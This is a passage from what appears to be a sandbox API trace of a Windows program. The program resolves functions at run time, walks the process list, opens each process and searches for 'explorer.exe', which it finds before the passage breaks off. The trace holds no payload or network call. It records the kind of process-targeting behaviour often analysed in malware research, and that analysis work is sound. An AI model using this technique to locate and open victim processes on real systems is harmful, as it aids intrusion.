hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0180.003] GetProcessHeap () returned 0x5f0000 [0180.003] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f110 [0180.003] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0180.003] GetProcessHeap () returned 0x5f0000 [0180.003] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f110 | out: hHeap=0x5f0000) returned 1 [0180.003] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.004] GetProcessHeap () returned 0x5f0000 [0180.004] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f100 [0180.004] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0180.004] GetProcessHeap () returned 0x5f0000 [0180.004] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f100 | out: hHeap=0x5f0000) returned 1 [0180.004] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x278) returned 0x1e0 [0180.004] GetProcessHeap () returned 0x5f0000 [0180.004] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f160 [0180.004] GetProcessHeap () returned 0x5f0000 [0180.004] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f220 [0180.005] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.005] GetProcessHeap () returned 0x5f0000 [0180.005] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.005] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0180.005] GetProcessHeap () returned 0x5f0000 [0180.005] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f160 | out: hHeap=0x5f0000) returned 1 [0180.005] GetProcessHeap () returned 0x5f0000 [0180.005] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f1a0 [0180.005] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0180.005] GetProcessHeap () returned 0x5f0000 [0180.005] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0180.005] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.006] GetProcessHeap () returned 0x5f0000 [0180.006] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f0c0 [0180.006] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0180.006] GetProcessHeap () returned 0x5f0000 [0180.006] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.006] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x298) returned 0x1e4 [0180.006] GetProcessHeap () returned 0x5f0000 [0180.006] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f1a0 [0180.006] GetProcessHeap () returned 0x5f0000 [0180.006] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f0c0 [0180.006] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.006] GetProcessHeap () returned 0x5f0000 [0180.006] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.006] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0180.006] GetProcessHeap () returned 0x5f0000 [0180.006] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0180.006] GetProcessHeap () returned 0x5f0000 [0180.006] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f0c0 [0180.006] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0180.006] GetProcessHeap () returned 0x5f0000 [0180.006] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.006] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0180.007] GetProcessHeap () returned 0x5f0000 [0180.007] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f0c0 [0180.007] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0180.007] GetProcessHeap () returned 0x5f0000 [0180.007] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.007] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x32c) returned 0x1e8 [0180.007] GetProcessHeap () returned 0x5f0000 [0180.007] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f1a0 [0180.007] GetProcessHeap () returned 0x5f0000 [0180.007] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f1b0 [0180.007] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.007] GetProcessHeap () returned 0x5f0000 [0180.007] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1b0 | out: hHeap=0x5f0000) returned 1 [0180.007] StrStrIA (lpFirst="dwm.exe", lpSrch="explorer.exe") returned 0x0 [0180.007] GetProcessHeap () returned 0x5f0000 [0180.008] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0180.008] GetProcessHeap () returned 0x5f0000 [0180.008] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f0c0 [0180.008] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0180.008] GetProcessHeap () returned 0x5f0000 [0180.008] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.008] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.008] GetProcessHeap () returned 0x5f0000 [0180.008] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f0d0 [0180.008] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0180.009] GetProcessHeap () returned 0x5f0000 [0180.009] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0d0 | out: hHeap=0x5f0000) returned 1 [0180.009] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x360) returned 0x1ec [0180.009] GetProcessHeap () returned 0x5f0000 [0180.009] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f140 [0180.009] GetProcessHeap () returned 0x5f0000 [0180.009] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f230 [0180.009] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.009] GetProcessHeap () returned 0x5f0000 [0180.009] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f230 | out: hHeap=0x5f0000) returned 1 [0180.009] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0180.009] GetProcessHeap () returned 0x5f0000 [0180.009] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f140 | out: hHeap=0x5f0000) returned 1 [0180.009] GetProcessHeap () returned 0x5f0000 [0180.009] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f220 [0180.009] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0180.009] GetProcessHeap () returned 0x5f0000 [0180.009] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.009] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.010] GetProcessHeap () returned 0x5f0000 [0180.010] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f0c0 [0180.010] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0180.010] GetProcessHeap () returned 0x5f0000 [0180.010] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.010] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x37c) returned 0x1f0 [0180.010] GetProcessHeap () returned 0x5f0000 [0180.010] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f160 [0180.010] GetProcessHeap () returned 0x5f0000 [0180.010] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f0c0 [0180.010] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.010] GetProcessHeap () returned 0x5f0000 [0180.010] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.010] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0180.010] GetProcessHeap () returned 0x5f0000 [0180.010] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f160 | out: hHeap=0x5f0000) returned 1 [0180.010] GetProcessHeap () returned 0x5f0000 [0180.010] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f220 [0180.010] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0180.010] GetProcessHeap () returned 0x5f0000 [0180.010] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.011] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.011] GetProcessHeap () returned 0x5f0000 [0180.011] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f220 [0180.011] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0180.011] GetProcessHeap () returned 0x5f0000 [0180.011] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.011] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x38c) returned 0x1f4 [0180.011] GetProcessHeap () returned 0x5f0000 [0180.011] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f220 [0180.011] GetProcessHeap () returned 0x5f0000 [0180.011] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f100 [0180.012] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.012] GetProcessHeap () returned 0x5f0000 [0180.012] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f100 | out: hHeap=0x5f0000) returned 1 [0180.012] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0180.012] GetProcessHeap () returned 0x5f0000 [0180.012] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.012] GetProcessHeap () returned 0x5f0000 [0180.012] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f0c0 [0180.012] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0180.012] GetProcessHeap () returned 0x5f0000 [0180.012] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.012] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.013] GetProcessHeap () returned 0x5f0000 [0180.013] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f140 [0180.013] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0180.013] GetProcessHeap () returned 0x5f0000 [0180.013] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f140 | out: hHeap=0x5f0000) returned 1 [0180.013] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x3e0) returned 0x1f8 [0180.013] GetProcessHeap () returned 0x5f0000 [0180.013] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f1a0 [0180.013] GetProcessHeap () returned 0x5f0000 [0180.013] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f0c0 [0180.013] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.013] GetProcessHeap () returned 0x5f0000 [0180.013] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.013] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0180.013] GetProcessHeap () returned 0x5f0000 [0180.013] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0180.013] GetProcessHeap () returned 0x5f0000 [0180.013] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f0c0 [0180.013] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0180.013] GetProcessHeap () returned 0x5f0000 [0180.013] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.013] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.014] GetProcessHeap () returned 0x5f0000 [0180.014] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f100 [0180.014] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0180.014] GetProcessHeap () returned 0x5f0000 [0180.014] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f100 | out: hHeap=0x5f0000) returned 1 [0180.014] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x3ec) returned 0x1fc [0180.014] GetProcessHeap () returned 0x5f0000 [0180.014] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f0c0 [0180.014] GetProcessHeap () returned 0x5f0000 [0180.014] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f0d0 [0180.014] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.014] GetProcessHeap () returned 0x5f0000 [0180.014] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0d0 | out: hHeap=0x5f0000) returned 1 [0180.014] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0180.014] GetProcessHeap () returned 0x5f0000 [0180.014] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.014] GetProcessHeap () returned 0x5f0000 [0180.015] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f0c0 [0180.015] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0180.015] GetProcessHeap () returned 0x5f0000 [0180.015] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.015] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x47, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.015] GetProcessHeap () returned 0x5f0000 [0180.015] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f220 [0180.015] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0180.015] GetProcessHeap () returned 0x5f0000 [0180.015] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.016] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x60) returned 0x200 [0180.016] GetProcessHeap () returned 0x5f0000 [0180.016] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f220 [0180.016] GetProcessHeap () returned 0x5f0000 [0180.016] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f1a0 [0180.016] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.016] GetProcessHeap () returned 0x5f0000 [0180.016] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0180.016] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0180.016] GetProcessHeap () returned 0x5f0000 [0180.016] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.016] GetProcessHeap () returned 0x5f0000 [0180.016] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f0c0 [0180.016] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0180.016] GetProcessHeap () returned 0x5f0000 [0180.016] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.016] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.017] GetProcessHeap () returned 0x5f0000 [0180.017] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f1a0 [0180.017] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0180.017] GetProcessHeap () returned 0x5f0000 [0180.017] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0180.017] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x468) returned 0x204 [0180.017] GetProcessHeap () returned 0x5f0000 [0180.017] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f220 [0180.017] GetProcessHeap () returned 0x5f0000 [0180.017] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f1a0 [0180.017] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.017] GetProcessHeap () returned 0x5f0000 [0180.017] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0180.017] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0180.017] GetProcessHeap () returned 0x5f0000 [0180.017] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.017] GetProcessHeap () returned 0x5f0000 [0180.017] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f140 [0180.017] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0180.017] GetProcessHeap () returned 0x5f0000 [0180.017] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f140 | out: hHeap=0x5f0000) returned 1 [0180.017] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0180.018] GetProcessHeap () returned 0x5f0000 [0180.018] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f220 [0180.018] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0180.018] GetProcessHeap () returned 0x5f0000 [0180.018] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.018] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x4bc) returned 0x208 [0180.018] GetProcessHeap () returned 0x5f0000 [0180.018] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f110 [0180.018] GetProcessHeap () returned 0x5f0000 [0180.018] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f0d0 [0180.018] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.019] GetProcessHeap () returned 0x5f0000 [0180.019] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0d0 | out: hHeap=0x5f0000) returned 1 [0180.019] StrStrIA (lpFirst="spoolsv.exe", lpSrch="explorer.exe") returned 0x0 [0180.019] GetProcessHeap () returned 0x5f0000 [0180.019] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f110 | out: hHeap=0x5f0000) returned 1 [0180.019] GetProcessHeap () returned 0x5f0000 [0180.019] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f100 [0180.019] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0180.019] GetProcessHeap () returned 0x5f0000 [0180.019] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f100 | out: hHeap=0x5f0000) returned 1 [0180.019] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0180.020] GetProcessHeap () returned 0x5f0000 [0180.020] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f100 [0180.020] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0180.020] GetProcessHeap () returned 0x5f0000 [0180.020] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f100 | out: hHeap=0x5f0000) returned 1 [0180.020] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x568) returned 0x20c [0180.020] GetProcessHeap () returned 0x5f0000 [0180.020] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f1a0 [0180.020] GetProcessHeap () returned 0x5f0000 [0180.020] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f220 [0180.020] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.020] GetProcessHeap () returned 0x5f0000 [0180.020] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.020] StrStrIA (lpFirst="sihost.exe", lpSrch="explorer.exe") returned 0x0 [0180.020] GetProcessHeap () returned 0x5f0000 [0180.020] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0180.020] GetProcessHeap () returned 0x5f0000 [0180.020] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f160 [0180.020] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0180.020] GetProcessHeap () returned 0x5f0000 [0180.020] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f160 | out: hHeap=0x5f0000) returned 1 [0180.020] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.021] GetProcessHeap () returned 0x5f0000 [0180.021] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f1a0 [0180.021] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0180.021] GetProcessHeap () returned 0x5f0000 [0180.021] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0180.021] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x640) returned 0x210 [0180.021] GetProcessHeap () returned 0x5f0000 [0180.021] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f220 [0180.021] GetProcessHeap () returned 0x5f0000 [0180.021] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f140 [0180.022] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.022] GetProcessHeap () returned 0x5f0000 [0180.022] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f140 | out: hHeap=0x5f0000) returned 1 [0180.022] StrStrIA (lpFirst="explorer.exe", lpSrch="explorer.exe") returned="explorer.exe" [0180.022] GetProcessHeap () returned 0x5f0000 [0180.022] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.022] GetProcessHeap () returned 0x5f0000 [0180.022] RtlAllocateHeap (HeapHandle=0x5f0000, 